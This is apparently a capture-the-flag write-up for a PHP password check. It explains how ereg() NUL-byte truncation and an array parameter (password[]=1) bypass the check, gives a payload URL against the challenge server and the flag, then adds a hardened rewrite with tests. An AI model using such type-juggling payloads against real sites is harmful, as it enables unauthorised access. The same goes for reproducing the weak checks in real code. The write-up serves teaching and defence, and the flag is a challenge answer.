<?php
$flag = "flag";
if (isset($_GET['password'])) {
    if (ereg("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE)
        echo 'You password must be alphanumeric';
    else if (strpos($_GET['password'], '--') !== FALSE)
        die('Flag: ' . $flag);
    else
        echo 'Invalid password';
}
?>
ereg() stops reading at a %00 (NUL) byte, so anything after it is never checked against the regex.
Passing an array instead of a string makes both ereg() and strpos() return NULL rather than FALSE: NULL === FALSE is false (the regex check is skipped) and NULL !== FALSE is true (the '--' check passes), so the die() branch is reached.
Payload:
http://123.206.87.240:9009/19.php?password[]=1
PHP is weakly typed, and array-valued parameters like password[] are a common way to break functions that expect a string.
Flag: flag{ctf-bugku-ad-2131212}
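For comparison, here is a hardened version of the same check, added to this writeup and not part of the challenge source. It assumes PHP 7 or later (ereg() was removed in PHP 7) and replaces ereg() with preg_match(); the helper name check_password() and the sample inputs are constructed for the example.

```php
<?php
// Added example: hardened rewrite of the challenge's password check.
// Assumes PHP 7+ where ereg() no longer exists.
function check_password($password): string
{
    // Reject anything that is not a string. password[]=1 arrives as an array,
    // which is what made ereg() and strpos() return NULL in the original code.
    if (!is_string($password)) {
        return 'Password must be a string';
    }
    // preg_match() with the D modifier so "$" matches only at the very end
    // (without D, "$" also matches before a trailing newline). A NUL byte is
    // not in [a-zA-Z0-9], so it is rejected instead of truncating the input
    // the way ereg() did. preg_match() returns 1 on match, 0 on no match,
    // false on error; anything other than 1 is treated as a failure.
    if (preg_match('/^[a-zA-Z0-9]+$/D', $password) !== 1) {
        return 'Password must be alphanumeric';
    }
    // Input is proven alphanumeric here, so '--' cannot be present and this
    // branch is unreachable. The comparison stays strict (!== false) so a
    // 0 offset is never confused with "not found".
    if (strpos($password, '--') !== false) {
        return 'Flag: (unreachable)';
    }
    return 'Invalid password';
}

// Constructed inputs mirroring the two bypass classes from the writeup.
$cases = [
    ['abc123',  'Invalid password'],               // well-formed input
    ["1\0--",   'Password must be alphanumeric'],  // NUL-byte truncation attempt
    [['1'],     'Password must be a string'],      // password[]=1 (array input)
];
foreach ($cases as [$input, $expected]) {
    $got = check_password($input);
    echo ($got === $expected ? 'ok   ' : 'FAIL ')
        . var_export($input, true) . ' => ' . $got . "\n";
}
```

The two changes that matter are the is_string() gate, which closes the array trick, and preg_match() over a binary-safe pattern, which closes the NUL-byte trick; the strict comparisons are kept so that a NULL or 0 return value can never be read as success.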